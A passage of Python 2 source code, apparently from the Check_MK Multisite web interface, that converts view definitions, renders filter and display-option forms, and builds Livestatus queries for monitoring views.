for ident, vs in view_editor_specs(ds_name, general_properties):
vs.render_input(ident, view.get(ident))
# Is used to change the view structure to be compatible to
# the valuespec This needs to perform the inverted steps of the
# transform_valuespec_value_to_view() function. FIXME: One day we should
# rewrite this to make no transform needed anymore
def transform_view_to_valuespec_value(view):
view["view"] = {} # Several global variables are put into a sub-dict
# Only copy our known keys. Reporting element, etc. might have their own keys as well
for key in [ "datasource", "browser_reload", "layout", "num_columns", "column_headers" ]:
if key in view:
view["view"][key] = view[key]
view["view"]['options'] = []
for key, title in view_editor_options():
if view.get(key):
view['view']['options'].append(key)
view['visibility'] = []
for key in [ 'hidden', 'hidebutton', 'public' ]:
if view.get(key):
view['visibility'].append(key)
view['grouping'] = { "grouping" : view.get('group_painters', []) }
view['sorting'] = { "sorters" : view.get('sorters', {}) }
columns = []
view['columns'] = { "columns" : columns }
for entry in view.get('painters', []):
if len(entry) == 5:
pname, viewname, tooltip, join_index, col_title = entry
columns.append((pname, join_index, viewname, tooltip, col_title))
elif len(entry) == 4:
pname, viewname, tooltip, join_index = entry
columns.append((pname, join_index, viewname, tooltip, ''))
elif len(entry) == 3:
pname, viewname, tooltip = entry
columns.append((pname, viewname, tooltip))
else:
pname, viewname = entry
columns.append((pname, viewname, ''))
def transform_valuespec_value_to_view(view):
for ident, attrs in view.items():
# Transform some valuespec specific options to legacy view
# format. We do not want to change the view data structure
# at the moment.
if ident == 'view':
if "options" in attrs:
# First set all options to false
for option in dict(view_editor_options()).keys():
view[option] = False
# Then set the selected single options
for option in attrs['options']:
view[option] = True
# And cleanup
del attrs['options']
view.update(attrs)
del view["view"]
elif ident == 'sorting':
view.update(attrs)
del view["sorting"]
elif ident == 'grouping':
view['group_painters'] = attrs['grouping']
del view["grouping"]
elif ident == 'columns':
painters = []
for column in attrs['columns']:
if len(column) == 5:
pname, join_index, viewname, tooltip, col_title = column
else:
pname, viewname, tooltip = column
join_index, col_title = None, None
viewname = viewname and viewname or None
if join_index and col_title:
painters.append((pname, viewname, tooltip, join_index, col_title))
elif join_index:
painters.append((pname, viewname, tooltip, join_index))
else:
painters.append((pname, viewname, tooltip))
view['painters'] = painters
del view["columns"]
# Extract properties of view from HTML variables and construct
# view object, to be used for saving or displaying
#
# old_view is the old view dict which might be loaded from storage.
# view is the new dict object to be updated.
def create_view_from_valuespec(old_view, view):
ds_name = old_view.get('datasource', html.var('datasource'))
view['datasource'] = ds_name
vs_value = {}
for ident, vs in view_editor_specs(ds_name):
attrs = vs.from_html_vars(ident)
vs.validate_value(attrs, ident)
vs_value[ident] = attrs
transform_valuespec_value_to_view(vs_value)
view.update(vs_value)
return view
#.
# .--Display View--------------------------------------------------------.
# | ____ _ _ __ ___ |
# | | _ \(_)___ _ __ | | __ _ _ _ \ \ / (_) _____ __ |
# | | | | | / __| '_ \| |/ _` | | | | \ \ / /| |/ _ \ \ /\ / / |
# | | |_| | \__ \ |_) | | (_| | |_| | \ V / | | __/\ V V / |
# | |____/|_|___/ .__/|_|\__,_|\__, | \_/ |_|\___| \_/\_/ |
# | |_| |___/ |
# +----------------------------------------------------------------------+
# | |
# '----------------------------------------------------------------------'
def show_filter(f):
if not f.visible():
html.write('<div style="display:none">')
f.display()
html.write('</div>')
else:
visuals.show_filter(f)
def show_filter_form(is_open, filters):
# Table muss einen anderen Namen, als das Formular
html.write('<div class="view_form" id="filters" %s>'
% (not is_open and 'style="display: none"' or '') )
html.begin_form("filter")
html.write("<table border=0 cellspacing=0 cellpadding=0 class=filterform><tr><td>")
# sort filters according to title
s = [(f.sort_index, f.title, f) for f in filters if f.available()]
s.sort()
# First show filters with double height (due to better floating
# layout)
for sort_index, title, f in s:
if f.double_height():
show_filter(f)
# Now single height filters
for sort_index, title, f in s:
if not f.double_height():
show_filter(f)
html.write("</td></tr><tr><td>")
html.button("search", _("Search"), "submit")
html.write("</td></tr></table>")
html.hidden_fields()
html.end_form()
html.write("</div>")
def show_painter_options(painter_options):
html.write('<div class="view_form" id="painteroptions" style="display: none">')
html.begin_form("painteroptions")
forms.header(_("Display Options"))
for on in painter_options:
vs = multisite_painter_options[on]['valuespec']
forms.section(vs.title())
vs.render_input('po_' + on, get_painter_option(on))
forms.end()
html.button("painter_options", _("Submit"), "submit")
html.hidden_fields()
html.end_form()
html.write('</div>')
def page_view():
bi.reset_cache_status() # needed for status icon
load_views()
view_name = html.var("view_name")
if view_name == None:
raise MKGeneralException(_("Missing the variable view_name in the URL."))
view = available_views.get(view_name)
if not view:
raise MKGeneralException(_("No view defined with the name '%s'.") % html.attrencode(view_name))
# Gather the page context which is needed for the "add to visual" popup menu
# to add e.g. views to dashboards or reports
datasource = multisite_datasources[view['datasource']]
context = visuals.get_context_from_uri_vars(datasource['infos'])
context.update(visuals.get_singlecontext_html_vars(view))
html.set_page_context(context)
show_view(view, True, True, True)
# Get a list of columns we need to fetch in order to
# render a given list of painters. If join_columns is True,
# then we only return the list needed by "Join" columns, i.e.
# columns that need to fetch information from another table
# (e.g. from the services table while we are in a hosts view)
# If join_columns is False, we only return the "normal" columns.
def get_needed_columns(view, painters):
# Make sure that the information about the available views is present. If
# called via the reporting, than this might not be the case
views = permitted_views()
columns = []
for entry in painters:
painter = entry[0]
linkview_name = entry[1]
columns += get_painter_columns(painter)
if linkview_name:
linkview = views.get(linkview_name)
if linkview:
for filt in [ visuals.get_filter(fn) for fn in visuals.get_single_info_keys(linkview) ]:
columns += filt.link_columns
if len(entry) > 2 and entry[2]:
tt = entry[2]
columns += get_painter_columns(multisite_painters[tt])
return columns
def get_painter_columns(painter):
if type(lambda: None) == type(painter["columns"]):
return painter["columns"]()
else:
return painter["columns"]
# Display options are flags that control which elements of a
# view should be displayed (buttons, sorting, etc.). They can be
# specified via the URL variable display_options. The function
# extracts this variable, applies defaults and generates
# three versions of the display options:
# Return value -> display options to actually use
# html.display_options -> display options to use in for URLs to other views
# html.title_display_options -> display options for title sorter links
def prepare_display_options():
# Display options (upper-case: show, lower-case: don't show)
# H The HTML header and body-tag (containing the tags <HTML> and <BODY>)
# T The title line showing the header and the logged in user
# B The blue context buttons that link to other views
# F The button for using filters
# C The button for using commands and all icons for commands (e.g. the reschedule icon)
# O The view options number of columns and refresh
# D The Display button, which contains column specific formatting settings
# E The button for editing the view
# Z The footer line, where refresh: 30s is being displayed
# R The auto-refreshing in general (browser reload)
# S The playing of alarm sounds (on critical and warning services)
# U Load persisted user row selections
# I All hyperlinks pointing to other views
# X All other hyperlinks (pointing to external applications like PNP, WATO or others)
# M If this option is not set, then all hyperlinks are targeted to the HTML frame
# with the name main. This is useful when using views as elements in the dashboard.
# L The column title links in multisite views
# W The limit and livestatus error message in views
all_display_options = "HTBFCEOZRSUIXDMLW"
# Parse display options and
if html.output_format == "html":
display_options = html.var("display_options", "")
else:
display_options = all_display_options.lower()
# If all display_options are upper case assume all not given values default
# to lower-case. Vice versa when all display_options are lower case.
# When the display_options are mixed case assume all unset options to be enabled
def apply_display_option_defaults(opts):
do_defaults = opts.isupper() and all_display_options.lower() or all_display_options
for c in do_defaults:
if c.lower() not in opts.lower():
opts += c
return opts
display_options = apply_display_option_defaults(display_options)
# Add the display_options to the html object for later linking etc.
html.display_options = display_options
# This is needed for letting only the data table reload. The problem is that
# the data table is re-fetched via javascript call using special display_options
# but these special display_options must not be used in links etc. So we use
# a special var _display_options for defining the display_options for rendering
# the data table to be reloaded. The contents of "display_options" are used for
# linking to other views.
if html.has_var('_display_options'):
display_options = html.var("_display_options", "")
display_options = apply_display_option_defaults(display_options)
html.display_options = display_options
# But there is one special case: The sorter links! These links need to know
# about the provided display_option parameter. The links could use
# "html.display_options" but this contains the implicit options which should
# not be added to the URLs. So the real parameters need to be preserved for
# this case. It is stored in the var "html.display_options"
if html.var('display_options'):
html.title_display_options = html.var("display_options")
# If display option 'M' is set, then all links are targetet to the 'main'
# frame. Also the display options are removed since the view in the main
# frame should be displayed in standard mode.
if 'M' not in display_options:
html.set_link_target("main")
html.del_var("display_options")
# Below we have the following display_options vars:
# html.display_options - Use this when rendering the current view
# html.var("display_options") - Use this for linking to other views
return display_options
# Display view with real data. This is *the* function everying
# is about.
def show_view(view, show_heading = False, show_buttons = True,
show_footer = True, render_function = None, only_count=False,
all_filters_active=False, limit=None):
display_options = prepare_display_options()
# User can override the layout settings via HTML variables (buttons)
# which are safed persistently. This is known as "view options". Note: a few
# can be anonymous (e.g. when embedded into a report). In that case there
# are no display options.
if "name" in view:
vo = view_options(view["name"])
else:
vo = {}
num_columns = vo.get("num_columns", view.get("num_columns", 1))
browser_reload = vo.get("refresh", view.get("browser_reload", None))
force_checkboxes = view.get("force_checkboxes", False)
show_checkboxes = force_checkboxes or html.var('show_checkboxes', '0') == '1'
# Get the datasource (i.e. the logical table)
datasource = multisite_datasources[view["datasource"]]
tablename = datasource["table"]
# Filters to use in the view
# In case of single object views, the needed filters are fixed, but not always present
# in context. In this case, take them from the context type definition.
use_filters = visuals.filters_of_visual(view, datasource['infos'],
all_filters_active, datasource.get('link_filters', {}))
# Not all filters are really shown later in show_filter_form(), because filters which
# have a hardcoded value are not changeable by the user
show_filters = visuals.visible_filters_of_visual(view, use_filters)
# FIXME TODO HACK to make grouping single contextes possible on host/service infos
# Is hopefully cleaned up soon.
if view['datasource'] in ['hosts', 'services']:
if html.has_var('hostgroup') and not html.has_var("opthost_group"):
html.set_var("opthost_group", html.var("hostgroup"))
if html.has_var('servicegroup') and not html.has_var("optservice_group"):
html.set_var("optservice_group", html.var("servicegroup"))
# Now populate the HTML vars with context vars from the view definition. Hard
# coded default values are treated differently:
#
# a) single context vars of the view are enforced
# b) multi context vars can be overwritten by existing HTML vars
visuals.add_context_to_uri_vars(view, datasource["infos"], only_count)
# Check that all needed information for configured single contexts are available
visuals.verify_single_contexts('views', view, datasource.get('link_filters', {}))
# Af any painter, sorter or filter needs the information about the host's
# inventory, then we load it and attach it as column "host_inventory"
need_inventory_data = False
# Prepare Filter headers for Livestatus
# TODO: When this is used by the reporting then *all* filters are
# active. That way the inventory data will always be loaded. When
# we convert this to the visuals principle the we need to optimize
# this.
filterheaders = ""
all_active_filters = [ f for f in use_filters if f.available() ]
for filt in all_active_filters:
header = filt.filter(tablename)
filterheaders += header
if filt.need_inventory():
need_inventory_data = True
# Apply the site hint / filter
if html.var("site"):
only_sites = [html.var("site")]
else:
only_sites = None
# Prepare limit:
# We had a problem with stats queries on the logtable where
# the limit was not applied on the resulting rows but on the
# lines of the log processed. This resulted in wrong stats.
# For these datasources we ignore the query limits.
if limit == None: # Otherwise: specified as argument
if not datasource.get('ignore_limit', False):
limit = get_limit()
# Fork to availability view. We just need the filter headers, since we do not query the normal
# hosts and service table, but "statehist". This is *not* true for BI availability, though (see later)
if html.var("mode") == "availability" and (
"aggr" not in datasource["infos"] or html.var("timeline_aggr")):
return render_availability_page(view, datasource, filterheaders, display_options, only_sites, limit)
query = filterheaders + view.get("add_headers", "")
# Sorting - use view sorters and URL supplied sorters
if not only_count:
sorter_list = html.has_var('sort') and parse_url_sorters(html.var('sort')) or view["sorters"]
sorters = [ (multisite_sorters[s[0]],) + s[1:] for s in sorter_list
if s[0] in multisite_sorters ]
else:
sorters = []
# Prepare grouping information
group_painters = [ (multisite_painters[e[0]],) + e[1:] for e in view["group_painters"]
if e[0] in multisite_painters ]
# Prepare columns to paint
painters = [ (multisite_painters[e[0]],) + e[1:] for e in view["painters"]
if e[0] in multisite_painters ]
# Now compute the list of all columns we need to query via Livestatus.
# Those are: (1) columns used by the sorters in use, (2) columns use by
# column- and group-painters in use and - note - (3) columns used to
# satisfy external references (filters) of views we link to. The last bit
# is the trickiest. Also compute this list of view options use by the
# painters
all_painters = group_painters + painters
join_painters = [ p for p in all_painters if len(p) >= 4 ]
master_painters = [ p for p in all_painters if len(p) < 4 ]
columns = get_needed_columns(view, master_painters)
join_columns = get_needed_columns(view, join_painters)
# Inventory data needed in any of the tool tips
for painter in master_painters:
if len(painter) > 2:
tooltip_painter_name = painter[2]
if tooltip_painter_name and tooltip_painter_name.startswith("inv_"):
need_inventory_data = True
# Columns needed for sorters
for s in sorters:
if len(s) == 2:
columns += s[0]["columns"]
else:
join_columns += s[0]["columns"]
if s[0].get("load_inv"):
need_inventory_data = True
# Add key columns, needed for executing commands
columns += datasource["keys"]
# Add idkey columns, needed for identifying the row
columns += datasource["idkeys"]
# BI availability needs aggr_tree
if html.var("mode") == "availability" and "aggr" in datasource["infos"]:
columns = [ "aggr_tree", "aggr_name", "aggr_group" ]
# Make column list unique and remove (implicit) site column
colset = set(columns)
if "site" in colset:
colset.remove("site")
columns = list(colset)
# Get list of painter options we need to display (such as PNP time range
# or the format being used for timestamp display)
painter_options = []
for entry in all_painters:
p = entry[0]
painter_options += p.get("options", [])
if p.get("load_inv"):
need_inventory_data = True
# Also layouts can register painter options
if "layout" in view:
painter_options += multisite_layouts[view["layout"]].get("options", [])
painter_options = list(set(painter_options))
painter_options.sort()
# Fetch data. Some views show data only after pressing [Search]
if (only_count or (not view.get("mustsearch")) or html.var("filled_in") in ["filter", 'actions', 'confirm', 'painteroptions']):
# names for additional columns (through Stats: headers)
add_columns = datasource.get("add_columns", [])
# tablename may be a function instead of a livestatus tablename
# In that case that function is used to compute the result.
if type(tablename) == type(lambda x:None):
rows = tablename(columns, query, only_sites, limit, all_active_filters)
else:
rows = query_data(datasource, columns, add_columns, query, only_sites, limit)
# Now add join information, if there are join columns
if len(join_painters) > 0:
do_table_join(datasource, rows, filterheaders, join_painters, join_columns, only_sites)
# Add inventory data if one of the painters or filters needs it
if need_inventory_data:
for row in rows:
if "host_name" in row:
row["host_inventory"] = inventory.host(row["host_name"])
sort_data(rows, sorters)
else:
rows = []
# Apply non-Livestatus filters
for filter in all_active_filters:
rows = filter.filter_table(rows)
if html.var("mode") == "availability":
render_bi_availability(view_title(view), rows)
return
# TODO: Use livestatus Stats: instead of fetching rows!
if only_count:
for fname, filter_vars in view["context"].items():
for varname, value in filter_vars.items():
html.del_var(varname)
return len(rows)
# The layout of the view: it can be overridden by several specifying
# an output format (like json or python). Note: the layout is not
# always needed. In case of an embedded view in the reporting this
# field is simply missing, because the rendering is done by the
# report itself.
# TODO: CSV export should be handled by the layouts. It cannot
# be done generic in most cases
if html.output_format == "html":
if "layout" in view:
layout = multisite_layouts[view["layout"]]
else:
layout = None
else:
if "layout" in view and "csv_export" in multisite_layouts[view["layout"]]:
multisite_layouts[view["layout"]]["csv_export"](rows, view, group_painters, painters)
return
else:
# Generic layout of export
layout = multisite_layouts.get(html.output_format)
if not layout:
layout = multisite_layouts["json"]
# Set browser reload
if browser_reload and 'R' in display_options and not only_count:
html.set_browser_reload(browser_reload)
# Until now no single byte of HTML code has been output.
# Now let's render the view. The render_function will be
# replaced by the mobile interface for an own version.
if not render_function:
render_function = render_view
render_function(view, rows, datasource, group_painters, painters,
display_options, painter_options, show_heading, show_buttons,
show_checkboxes, layout, num_columns, show_filters, show_footer,
browser_reload)
# Output HTML code of a view. If you add or remove paramters here,
# then please also do this in htdocs/mobile.py!
def render_view(view, rows, datasource, group_painters, painters,
display_options, painter_options, show_heading, show_buttons,
show_checkboxes, layout, num_columns, show_filters, show_footer,
browser_reload):
if html.transaction_valid() and html.do_actions():
html.set_browser_reload(0)
# Show heading (change between "preview" mode and full page mode)
if show_heading:
# Show/Hide the header with page title, MK logo, etc.
if 'H' in display_options:
# FIXME: view/layout/module related stylesheets/javascripts e.g. in case of BI?
html.body_start(view_title(view), stylesheets=["pages","views","status","bi"])
if 'T' in display_options:
html.top_heading(view_title(view))
has_done_actions = False
row_count = len(rows)
# This is a general flag which makes the command form render when the current
# view might be able to handle commands. When no commands are possible due missing
# permissions or datasources without commands, the form is not rendered
command_form = should_show_command_form(display_options, datasource)
if command_form:
weblib.init_selection()
# Is the layout able to display checkboxes?
can_display_checkboxes = layout.get('checkboxes', False)
if show_buttons:
show_context_links(view, show_filters, display_options,
painter_options,
# Take into account: permissions, display_options
row_count > 0 and command_form,
# Take into account: layout capabilities
can_display_checkboxes and not view.get("force_checkboxes"), show_checkboxes,
# Show link to availability
datasource["table"] in [ "hosts", "services" ] or "aggr" in datasource["infos"])
# User errors in filters
html.show_user_errors()
# Filter form
filter_isopen = view.get("mustsearch") and not html.var("filled_in")
if 'F' in display_options and len(show_filters) > 0:
show_filter_form(filter_isopen, show_filters)
# Actions
if command_form:
# If we are currently within an action (confirming or executing), then
# we display only the selected rows (if checkbox mode is active)
if show_checkboxes and html.do_actions():
rows = filter_selected_rows(view, rows, weblib.get_rowselection('view-' + view['name']))
# There are one shot actions which only want to affect one row, filter the rows
# by this id during actions
if html.has_var("_row_id") and html.do_actions():
rows = filter_by_row_id(view, rows)
if html.do_actions() and html.transaction_valid(): # submit button pressed, no reload
try:
# Create URI with all actions variables removed
backurl = html.makeuri([], delvars=['filled_in', 'actions'])
has_done_actions = do_actions(view, datasource["infos"][0], rows, backurl)
except MKUserError, e:
html.show_error(e)
html.add_user_error(e.varname, e)
if 'C' in display_options:
show_command_form(True, datasource)
elif 'C' in display_options: # (*not* display open, if checkboxes are currently shown)
show_command_form(False, datasource)
# Also execute commands in cases without command form (needed for Python-
# web service e.g. for NagStaMon)
elif row_count > 0 and config.may("general.act") \
and html.do_actions() and html.transaction_valid():
# There are one shot actions which only want to affect one row, filter the rows
# by this id during actions
if html.has_var("_row_id") and html.do_actions():
rows = filter_by_row_id(view, rows)
try:
do_actions(view, datasource["infos"][0], rows, '')
except:
pass # currently no feed back on webservice
if 'O' in display_options and len(painter_options) > 0 and config.may("general.painter_options"):
show_painter_options(painter_options)
# The refreshing content container
if 'R' in display_options:
html.write("<div id=data_container>\n")
if not has_done_actions:
# Limit exceeded? Show warning
if 'W' in display_options:
html.check_limit(rows, get_limit())
layout["render"](rows, view, group_painters, painters, num_columns,
show_checkboxes and not html.do_actions())
headinfo = "%d %s" % (row_count, row_count == 1 and _("row") or _("rows"))
if show_checkboxes:
selected = filter_selected_rows(view, rows, weblib.get_rowselection('view-' + view['name']))
headinfo = "%d/%s" % (len(selected), headinfo)
if html.output_format == "html":
html.javascript("update_headinfo('%s');" % headinfo)
# The number of rows might have changed to enable/disable actions and checkboxes
if show_buttons:
update_context_links(
# don't take display_options into account here ('c' is set during reload)
row_count > 0 and should_show_command_form('C', datasource),
# and not html.do_actions(),
can_display_checkboxes
)
# Play alarm sounds, if critical events have been displayed
if 'S' in display_options and view.get("play_sounds"):
play_alarm_sounds()
else:
# Always hide action related context links in this situation
update_context_links(False, False)
# In multi site setups error messages of single sites do not block the
# output and raise now exception. We simply print error messages here.
# In case of the web service we show errors only on single site installations.
if config.show_livestatus_errors \
and 'W' in display_options \
and (html.output_format == "html" or not config.is_multisite()):
for sitename, info in html.live.deadsites.items():
html.show_error("<b>%s - %s</b><br>%s" % (info["site"]["alias"], _('Livestatus error'), info["exception"]))
# FIXME: Sauberer wäre noch die Status Icons hier mit aufzunehmen
if 'R' in display_options:
html.write("</div>\n")
if show_footer:
pid = os.getpid()
if html.live.successfully_persisted():
html.add_status_icon("persist", _("Reused persistent livestatus connection from earlier request (PID %d)") % pid)
if bi.reused_compilation():
html.add_status_icon("aggrcomp", _("Reused cached compiled BI aggregations (PID %d)") % pid)
if config.may('wato.users'):
try:
msg = file(defaults.var_dir + '/web/ldap_sync_fail.mk').read()
html.add_status_icon("ldap", _('Last LDAP sync failed! %s') % html.attrencode(msg))
except IOError:
pass
html.bottom_focuscode()
if 'Z' in display_options:
html.bottom_footer()
if 'H' in display_options:
html.body_end()
# We should rename this into "painter_options". Also the saved file.
def view_options(viewname):
# Options are stored per view. Get all options for all views
vo = config.load_user_file("viewoptions", {})
# Now get options for the view in question
v = vo.get(viewname, {})
must_save = False
# Now override the loaded options with new option settings that are
# provided by the URL. Our problem: we do not know the URL variables
# that a valuespec expects. But we know the common prefix of all
# variables for each option.
if config.may("general.painter_options"):
for option_name, opt in multisite_painter_options.items():
have_old_value = option_name in v
if have_old_value:
old_value = v.get(option_name)
# Are there settings for this painter option present?
var_prefix = 'po_' + option_name
if html.has_var_prefix(var_prefix):
# Get new value for the option from the value spec
vs = opt['valuespec']
value = vs.from_html_vars(var_prefix)
v[option_name] = value
opt['value'] = value # make globally present for painters
if not have_old_value or v[option_name] != old_value:
must_save = True
elif have_old_value:
opt['value'] = old_value # make globally present for painters
elif 'value' in opt:
del opt['value']
# If the user has no permission for changing painter options
# (or has *lost* his permission) then we need to remove all
# of the options. But we do not save.
else:
for on, opt in multisite_painter_options.items():
if on in v:
del v[on]
must_save = True
if 'value' in opt:
del opt['value']
if must_save:
vo[viewname] = v
config.save_user_file("viewoptions", vo)
return v
def do_table_join(master_ds, master_rows, master_filters, join_painters, join_columns, only_sites):
join_table, join_master_column = master_ds["join"]
slave_ds = multisite_datasources[join_table]
join_slave_column = slave_ds["joinkey"]
# Create additional filters
join_filter = ""
for entry in join_painters:
paintfunc, linkview, title, join_key = entry[:4]
join_filter += "Filter: %s = %s\n" % (join_slave_column, join_key )
join_filter += "Or: %d\n" % len(join_painters)
query = master_filters + join_filter
rows = query_data(slave_ds, [join_master_column, join_slave_column] + join_columns, [], query, only_sites, None)
per_master_entry = {}
current_key = None
current_entry = None
for row in rows:
master_key = (row["site"], row[join_master_column])
if master_key != current_key:
current_key = master_key
current_entry = {}
per_master_entry[current_key] = current_entry
current_entry[row[join_slave_column]] = row
# Add this information into master table in artificial column "JOIN"
for row in master_rows:
key = (row["site"], row[join_master_column])
joininfo = per_master_entry.get(key, {})
row["JOIN"] = joininfo
def play_alarm_sounds():
if not config.enable_sounds:
return
url = config.sound_url
if not url.endswith("/"):
url += "/"
for event, wav in config.sounds:
if not event or html.has_event(event):
html.play_sound(url + wav)
break # only one sound at one time
# How many data rows may the user query?
def get_limit():
limitvar = html.var("limit", "soft")
if limitvar == "hard" and config.may("general.ignore_soft_limit"):
return config.hard_query_limit
elif limitvar == "none" and config.may("general.ignore_hard_limit"):
return None
else:
return config.soft_query_limit
def view_title(view):
return visuals.visual_title('view', view)
def view_optiondial(view, option, choices, help):
vo = view_options(view["name"])
# Darn: The option "refresh" has the name "browser_reload" in the
# view definition
if option == "refresh":
von = "browser_reload"
else:
von = option
value = vo.get(option, view.get(von, choices[0][0]))
title = dict(choices).get(value, value)
html.begin_context_buttons() # just to be sure
# Remove unicode strings
choices = [ [c[0], str(c[1])] for c in choices ]
html.write('<div title="%s" id="optiondial_%s" class="optiondial %s val_%s" '
'onclick="view_dial_option(this, \'%s\', \'%s\', %r);"><div>%s</div></div>' % (
help, option, option, value, view["name"], option, choices, title))
html.final_javascript("init_optiondial('optiondial_%s');" % option)
def view_optiondial_off(option):
html.write('<div class="optiondial off %s"></div>' % option)
# FIXME: Consolidate toggle rendering functions
def toggler(id, icon, help, onclick, value, hidden = False):
html.begin_context_buttons() # just to be sure
hide = hidden and ' style="display:none"' or ''
html.write('<div id="%s_on" title="%s" class="togglebutton %s %s" '
'onclick="%s"%s><img src="images/icon_%s.png"></div>' % (
id, help, icon, value and "down" or "up", onclick, hide, icon))
# Will be called when the user presses the upper button, in order
# to persist the new setting - and to make it active before the
# browser reload of the DIV containing the actual status data is done.
def ajax_set_viewoption():
view_name = html.var("view_name")
option = html.var("option")
value = html.var("value")
value = { 'true' : True, 'false' : False }.get(value, value)
if type(value) == str and value[0].isdigit():
try:
value = int(value)
except:
pass
vo = config.load_user_file("viewoptions", {})
vo.setdefault(view_name, {})
vo[view_name][option] = value
config.save_user_file("viewoptions", vo)
# FIXME: Consolidate toggle rendering functions
def togglebutton_off(id, icon, hidden = False):
html.begin_context_buttons()
hide = hidden and ' style="display:none"' or ''
html.write('<div id="%s_off" class="togglebutton off %s"%s>'
'<img src="images/icon_%s.png"></div>' % (id, icon, hide, icon))
# FIXME: Consolidate toggle rendering functions
def togglebutton(id, isopen, icon, help, hidden = False):
html.begin_context_buttons()
if isopen:
cssclass = "down"
else:
cssclass = "up"
hide = hidden and ' style="display:none"' or ''
html.write('<div id="%s_on" class="togglebutton %s %s" title="%s" '
'onclick="view_toggle_form(this, \'%s\');"%s>'
'<img src="images/icon_%s.png"></div>' % (id, icon, cssclass, help, id, hide, icon))
def show_context_links(thisview, show_filters, display_options,
painter_options, enable_commands, enable_checkboxes, show_checkboxes,
show_availability):
# html.begin_context_buttons() called automatically by html.context_button()
# That way if no button is painted we avoid the empty container
if 'B' in display_options:
execute_hooks('buttons-begin')
filter_isopen = html.var("filled_in") != "filter" and thisview.get("mustsearch")
if 'F' in display_options:
if len(show_filters) > 0:
if html.var("filled_in") == "filter":
icon = "filters_set"
help = _("The current data is being filtered")
else:
icon = "filters"
help = _("Set a filter for refining the shown data")
togglebutton("filters", filter_isopen, icon, help)
else:
togglebutton_off("filters", "filters")
if 'D' in display_options:
if len(painter_options) > 0 and config.may("general.painter_options"):
togglebutton("painteroptions", False, "painteroptions", _("Modify display options"))
else:
togglebutton_off("painteroptions", "painteroptions")
if 'C' in display_options:
togglebutton("commands", False, "commands", _("Execute commands on hosts, services and other objects"),
hidden = not enable_commands)
togglebutton_off("commands", "commands", hidden = enable_commands)
selection_enabled = (enable_commands and enable_checkboxes) or thisview.get("force_checkboxes")
if not thisview.get("force_checkboxes"):
toggler("checkbox", "checkbox", _("Enable/Disable checkboxes for selecting rows for commands"),
"location.href='%s';" % html.makeuri([('show_checkboxes', show_checkboxes and '0' or '1')]),
show_checkboxes, hidden = True) # not selection_enabled)
togglebutton_off("checkbox", "checkbox", hidden = not thisview.get("force_checkboxes"))
html.javascript('g_selection_enabled = %s;' % (selection_enabled and 'true' or 'false'))
if 'O' in display_options:
if config.may("general.view_option_columns"):
choices = [ [x, "%s" % x] for x in config.view_option_columns ]
view_optiondial(thisview, "num_columns", choices, _("Change the number of display columns"))
else:
view_optiondial_off("num_columns")
if 'R' in display_options and config.may("general.view_option_refresh"):
choices = [ [x, {0:_("off")}.get(x,str(x) + "s") + (x and "" or "")] for x in config.view_option_refreshes ]
view_optiondial(thisview, "refresh", choices, _("Change the refresh rate"))
else:
view_optiondial_off("refresh")
if 'B' in display_options:
# WATO: If we have a host context, then show button to WATO, if permissions allow this
if html.has_var("host") \
and config.wato_enabled \
and config.may("wato.use") \
and (config.may("wato.hosts") or config.may("wato.seeall")):
host = html.var("host")
if host:
url = wato.link_to_host_by_name(host)
else:
url = wato.link_to_folder_by_path(html.var("wato_folder", ""))
html.context_button(_("WATO"), url, "wato", id="wato",
bestof = config.context_buttons_to_show)
# Button for creating an instant report (if reporting is available)
if config.reporting_available() and config.may("general.reporting"):
html.context_button(_("Export as PDF"), html.makeuri([], filename="report_instant.py"), "report")
# Buttons to other views, dashboards, etc.
links = visuals.collect_context_links(thisview)
for linktitle, uri, icon, buttonid in links:
html.context_button(linktitle, url=uri, icon=icon, id=buttonid, bestof=config.context_buttons_to_show)
# Customize/Edit view button
if 'E' in display_options and config.may("general.edit_views"):
backurl = html.urlencode(html.makeuri([]))
if thisview["owner"] == config.user_id:
url = "edit_view.py?load_name=%s&back=%s" % (thisview["name"], backurl)
else:
url = "edit_view.py?load_user=%s&load_name=%s&back=%s" % \
(thisview["owner"], thisview["name"], backurl)
html.context_button(_("Edit View"), url, "edit", id="edit", bestof=config.context_buttons_to_show)
if 'E' in display_options and show_availability:
html.context_button(_("Availability"), html.makeuri([("mode", "availability")]), "availability")
if 'B' in display_options:
execute_hooks('buttons-end')
html.end_context_buttons()
def update_context_links(enable_command_toggle, enable_checkbox_toggle):
html.javascript("update_togglebutton('commands', %d);" % (enable_command_toggle and 1 or 0))
html.javascript("update_togglebutton('checkbox', %d);" % (enable_command_toggle and enable_checkbox_toggle and 1 or 0, ))
def ajax_count_button():
id = html.var("id")
counts = config.load_user_file("buttoncounts", {})
for i in counts:
counts[i] *= 0.95
counts.setdefault(id, 0)
counts[id] += 1
config.save_user_file("buttoncounts", counts)
# Retrieve data via livestatus, convert into list of dicts,
# prepare row-function needed for painters
# datasource: the datasource object as defined in plugins/views/datasources.py
# columns: the list of livestatus columns to query
# add_columns: list of columns the datasource is known to add itself
# (couldn't we get rid of this parameter by looking that up ourselves?)
# add_headers: additional livestatus headers to add
# only_sites: list of sites the query is limited to
# limit: maximum number of data rows to query
def query_data(datasource, columns, add_columns, add_headers, only_sites = [], limit = None):
tablename = datasource["table"]
add_headers += datasource.get("add_headers", "")
merge_column = datasource.get("merge_by")
if merge_column:
columns = [merge_column] + columns
# Most layouts need current state of object in order to
# choose background color - even if no painter for state
# is selected. Make sure those columns are fetched. This
# must not be done for the table 'log' as it cannot correctly
# distinguish between service_state and host_state
if "log" not in datasource["infos"]:
state_columns = []
if "service" in datasource["infos"]:
state_columns += [ "service_has_been_checked", "service_state" ]
if "host" in datasource["infos"]:
state_columns += [ "host_has_been_checked", "host_state" ]
for c in state_columns:
if c not in columns:
columns.append(c)
# Remove columns which are implicitely added by the datasource
columns = [ c for c in columns if c not in add_columns ]
query = "GET %s\n" % tablename
return do_query_data(query, columns, add_columns, merge_column,
add_headers, only_sites, limit)
def do_query_data(query, columns, add_columns, merge_column,
add_headers, only_sites, limit):
query += "Columns: %s\n" % " ".join(columns)
query += add_headers
html.live.set_prepend_site(True)
if limit != None:
html.live.set_limit(limit + 1) # + 1: We need to know, if limit is exceeded
if config.debug_livestatus_queries \
and html.output_format == "html" and 'W' in html.display_options:
html.write('<div class="livestatus message">'
'<tt>%s</tt></div>\n' % (query.replace('\n', '<br>\n')))
if only_sites:
html.live.set_only_sites(only_sites)
data = html.live.query(query)
html.live.set_only_sites(None)
html.live.set_prepend_site(False)
html.live.set_limit() # removes limit
if merge_column:
data = merge_data(data, columns)
# convert lists-rows into dictionaries.
# performance, but makes live much easier later.
columns = ["site"] + columns + add_columns
